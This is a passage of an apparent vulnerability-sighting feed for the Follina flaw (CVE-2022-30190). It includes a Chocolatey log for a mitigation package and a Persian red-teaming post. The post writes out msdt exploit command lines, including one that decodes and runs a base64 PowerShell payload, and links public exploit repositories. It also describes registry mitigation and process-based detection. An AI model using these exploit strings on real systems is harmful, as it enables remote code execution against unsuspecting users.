'C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.files'\n2026-06-09 18:36:15,696 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.extra\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.version\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.sxs\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.pin\".\n2026-06-09 18:36:15,729 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.deploymentLocation\".\n2026-06-09 18:36:15,774 4968 [DEBUG] - Sending message 'HandlePackageResultCompletedMessage' out if there are subscribers...\n2026-06-09 18:36:15,774 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\.chocolateyPending\".\n2026-06-09 18:36:15,774 4968 [INFO ] -  The install 
of disable-ms-msdt was successful.\n2026-06-09 18:36:15,790 4968 [INFO ] -   Software install location not explicitly set, it could be in package or\n  default install location of installer.\n2026-06-09 18:36:15,852 4968 [WARN ] - \nChocolatey installed 2/2 packages. \n See the log for details (C:\\ProgramData\\chocolatey\\logs\\chocolatey.log).\n2026-06-09 18:36:15,869 4968 [DEBUG] - Sending message 'PostRunMessage' out if there are subscribers...\n2026-06-09 18:36:15,869 4968 [DEBUG] - Exiting with 0\n", "creation_timestamp": "2026-06-09T18:36:59.000000Z"}, {"uuid": "d5fb0037-5a4c-426c-8388-94941dd62bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/401a026b524772fda41c0ecb57d92a4c", "content": "", "creation_timestamp": "2026-05-04T17:03:16.000000Z"}, {"uuid": "2d919a70-daf4-4e86-a7e9-5a486a51cffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/bpwD1lFGrjpZJE8nZPfkQ7he0n0Dc1Zua8DNoZEQncgtG5Y", "content": "", "creation_timestamp": "2026-05-08T15:00:06.000000Z"}, {"uuid": "1a55f39d-7646-4079-bd5c-dcc797a6ff7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/referencebooks0/82", "content": "\u2b55\ufe0f \u062f\u0631 initial access \u06a9\u0647 \u062c\u0632\u06cc\u06cc \u0627\u0632 \u067e\u0631\u0648\u0633\u0647 Red Teaming \u0648 \u062f\u0631 \u062d\u0645\u0644\u0627\u062a Client access \u0647\u0633\u062a\u060c \u0645\u0627 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0645\u062a\u0641\u0627\u0648\u062a\u06cc \u0645\u06cc\u062a\u0648\u0627\u0646\u06cc\u0645 
\u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 \u0627\u0639\u0645 \u0627\u0632 macro \u0647\u0627 \u062f\u0631 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0647\u0627\u06cc \u06af\u0631\u0648\u0647 \u0622\u0641\u06cc\u0633 \u0648...\n\u062d\u0627\u0644\u0627 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc \u0634\u0628\u06cc\u0647 macro \u0628\u0647 \u0627\u0633\u0645 remote template \u06a9\u0647 \u0628\u0627 \u067e\u0631\u0648\u062a\u06a9\u0644\u06cc \u0628\u0647 \u0627\u0633\u0645 MSDT \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0635\u0648\u0631\u062a \u0645\u06cc\u06af\u06cc\u0631\u0647 \u06a9\u0647 \u0628\u0627\u06cc\u062f \u06af\u0641\u062a \u0628\u0631 \u0631\u0648\u06cc word\u0648 teams \u0648 Excel \u0648 outlook \u0648 Foxit PDF \u0635\u0648\u0631\u062a \u0645\u06cc\u06af\u06cc\u0631\u0647 \u0646\u0627\u06af\u0641\u062a\u0647 \u0646\u0645\u0648\u0646\u0647 \u06a9\u0647 \u0628\u0647 \u062a\u0646\u0647\u0627\u06cc\u06cc \u0647\u0645 \u0645\u06cc\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0648 \u0627\u062c\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0647\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647\u0631\u0647 \u0628\u0628\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0648\u0627\u0642\u0639 \u0645\u0627 \u0645\u06cc\u062a\u0648\u0646\u06cc\u0645 \u0628\u0647 \u0635\u0648\u0631\u062a \u0631\u06cc\u0645\u0648\u062a \u06cc\u06a9 \u0641\u0627\u06cc\u0644 html \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 , \u0686\u0648\u0646 \u0631\u0628\u0637\u06cc \u0628\u0647 \u0645\u0627\u06a9\u0631\u0648 \u0647\u0627 \u0646\u062f\u0627\u0631\u0647 \u0645\u0627 \u0645\u0627\u06a9\u0631\u0648 \u0631\u0648 \u0647\u0645 
\u063a\u06cc\u0631 \u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u0645 \u0627\u0632\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0645\u06cc\u062a\u0648\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.\n\u062d\u0627\u0644\u0627 \u0646\u06a9\u062a\u0647 \u0627\u06cc \u06a9\u0647 \u0647\u0633\u062a\n\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062e\u0637 \u06a9\u0627\u0645\u0646\u062f:\n\nmsdt /id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\n\n\u0645\u0627\u0634\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 \n\u0648 \u0628\u0627 \u0627\u062c\u0631\u0627\u06cc : \n\nmsdt:/id PCWDiagnostic /skip force /param \\\\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\\\"\n\u0627\u06af\u0631 \u062c\u0627\u06cc base64_payload \u067e\u06cc\u0644\u0648\u062f \u0645\u0627 \u0628\u0627\u0634\u0647\u00a0 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 .\n\n\u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0645\u06cc\u062a\u0648\u0627\u0646 \u0627\u0632 \u0631\u0648\u0634\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f :\u200c\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\nhttps://github.com/JohnHammond/msdt-follina\n\u0627\u0632 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0647\u0627 
\u0645\u06cc\u062a\u0648\u0627\u0646 \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.\nhttps://github.com/rayorole/CVE-2022-30190\n\u0627\u06cc\u0646 \u0647\u0645 \u0641\u0627\u06cc\u0644 HTML \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0647\u0633\u062a\u0634\n\u0628\u0639\u062f \u0627\u0632 \u062a\u0633\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u0631\u0633\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0628\u0627\u06cc\u062f \u0686\u06a9\u0627\u0631 \u06a9\u0631\u062f\u061f\n\u0627\u0648\u0644 \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0646\u06a9\u0647 \u0622\u06cc\u0627 \u0641\u0627\u06cc\u0644\u06cc \u0622\u0644\u0648\u062f\u0647 \u0647\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631 , \u062f\u0648 \u0631\u0627\u0647 \u0647\u0633\u062a\n\u0631\u0627\u0647 \u0627\u0648\u0644 \u0627\u06cc\u0646\u0647 \u06a9\u0647 \u0641\u0627\u06cc\u0644 \u062f\u0631\u06cc\u0627\u0641\u062a\u06cc \u0631\u0627 \u0628\u0647 zip \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0646\u06cc\u0645 \u0648\u00a0 \\word\\_rels\\document.xml.rels \u0631\u0648 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u0645, \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646\u06a9\u0627\u0631 \u0627\u0628\u0632\u0627\u0631\u06cc \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u0641\u0627\u06cc\u0644 \u0647\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9 \u0647\u0633\u062a. 
\n\u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0645 \u062f\u0631 \u0631\u062c\u06cc\u0633\u062a\u0631\u06cc \u0645\u0633\u06cc\u0631 HKEY_CLASSES_ROOT\\ms-msdt \u0631\u0627 \u062d\u0630\u0641 \u0645\u06cc\u06a9\u0646\u06cc\u0645.\n\u0646\u06a9\u062a\u0647 \u062f\u06cc\u06af\u0647 \u0627\u06cc \u06a9\u0647 \u0647\u0633\u062a \u062d\u0627\u0644\u0627 \u0645\u0627 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0627 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0627\u06cc\u0646 \u0627\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u0645\u0648\u0646 \u06cc\u0627 \u062e\u06cc\u0631 \u0686\u0647 \u0628\u0627\u06cc\u062f \u06a9\u0646\u06cc\u0645\u061f\n\u0627\u06af\u0631 \u0628\u0647 \u0635\u0648\u0631\u062a \u06a9\u0627\u0645\u0646\u062f\u06cc \u0635\u0648\u0631\u062a \u06af\u0631\u0641\u062a\u0647 \u0628\u0627\u0634\u0647 \u0628\u0627\u06cc\u062f \n\u062f\u0631 \u067e\u0631\u0648\u0633\u0647 \u0647\u0627 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 msdt \u0648 sdiagnhost \u0648 conhost \u0628\u06af\u0631\u062f\u06cc\u0645\n\u062d\u0627\u0644\u0627 \u0627\u06af\u0631 \u0648\u0631\u062f\u06cc \u0627\u062c\u0631\u0627 \u0634\u0648\u062f , \u067e\u0631\u0648\u0633\u0647 winword \u0648 msiexec \u0648 mshta \u0648 msdt \u0645\u0634\u06a9\u0648\u06a9 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627\u0634\u0647. 
\u0646\u06a9\u062a\u0647 \u0628\u0639\u062f\u06cc \u06a9\u0647 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u0647\u0645\u06cc\u062a \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0647\n\u0628\u0647 \u0647\u0631 \u0637\u0631\u06cc\u0642\u06cc \u06a9\u0647 \u0645\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 \n\u06cc\u06a9 \u0641\u0627\u06cc\u0644 xml \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u0634\u0647 \u06a9\u0647 \u0645\u0634\u062e\u0635 \u0645\u06cc\u06a9\u0646\u0647 \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f\u0647(\u0627\u0644\u0628\u062a\u0647 \u062e\u06cc\u0644\u06cc \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0627\u0647\u0645\u06cc\u062a \u0646\u062f\u0627\u0631\u0647 \u0686\u0648\u0646 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0647\u06a9\u0631 \u0628\u0639\u062f \u0627\u0632 \u0627\u0642\u062f\u0627\u0645\u0634 \u067e\u0627\u06a9\u0634\u0648\u0646 \u06a9\u0646\u0647 )\n\u062f\u0631 \u0645\u0633\u06cc\u0631 appdata/local/diagnostics \u0647\u0633\u062a\u0634.", "creation_timestamp": "2023-12-05T15:14:53.000000Z"}]}